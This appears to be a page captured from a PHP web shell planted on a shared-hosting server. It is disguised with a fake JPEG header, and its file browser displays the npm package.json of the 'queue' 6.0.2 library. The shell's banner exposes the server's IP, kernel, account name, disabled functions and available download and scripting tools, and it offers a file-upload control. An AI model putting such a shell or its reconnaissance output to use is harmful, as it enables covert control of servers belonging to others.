ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.68 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/queue/ |
Upload File : |
{ "_from": "queue@6.0.2", "_id": "queue@6.0.2", "_inBundle": false, "_integrity": "sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA==", "_location": "/queue", "_phantomChildren": {}, "_requested": { "type": "version", "registry": true, "raw": "queue@6.0.2", "name": "queue", "escapedName": "queue", "rawSpec": "6.0.2", "saveSpec": null, "fetchSpec": "6.0.2" }, "_requiredBy": [ "/image-size" ], "_resolved": "https://registry.npmjs.org/queue/-/queue-6.0.2.tgz", "_shasum": "b91525283e2315c7553d2efa18d83e76432fed65", "_spec": "queue@6.0.2", "_where": "/home/taxhyuvu/nodevenv/dp_taxhelplines/10/lib/node_modules/image-size", "author": { "name": "Jesse Tane", "email": "jesse.tane@gmail.com" }, "bugs": { "url": "https://github.com/jessetane/queue/issues" }, "bundleDependencies": false, "dependencies": { "inherits": "~2.0.3" }, "deprecated": false, "description": "asynchronous function queue with adjustable concurrency", "devDependencies": { "@types/node": "*", "browserify": "^16.2.3", "coveralls": "^3.0.3", "istanbul": "^0.4.5", "standard": "^12.0.1", "tape": "^4.10.1", "tsd-check": "*", "typescript": "^3.3.3333" }, "files": [ "index.js", "index.d.ts" ], "homepage": "https://github.com/jessetane/queue#readme", "keywords": [ "queue", "async", "asynchronous", "synchronous", "job", "task", "concurrency", "concurrent" ], "license": "MIT", "name": "queue", "repository": { "type": "git", "url": "git+https://github.com/jessetane/queue.git" }, "scripts": { "example": "node example", "lint": "standard", "test": "standard && node test && tsd-check", "test-browser": "standard && browserify test/index.js > test/bundle.js && echo \"open test/index.html in your browser\"", "travis": "standard && istanbul cover test --report lcovonly && cat coverage/lcov.info | coveralls", "travis-ts": "tsc test/typescript.ts --m System --out /dev/null && echo 'TypeScript compilation passed.'" }, "version": "6.0.2" }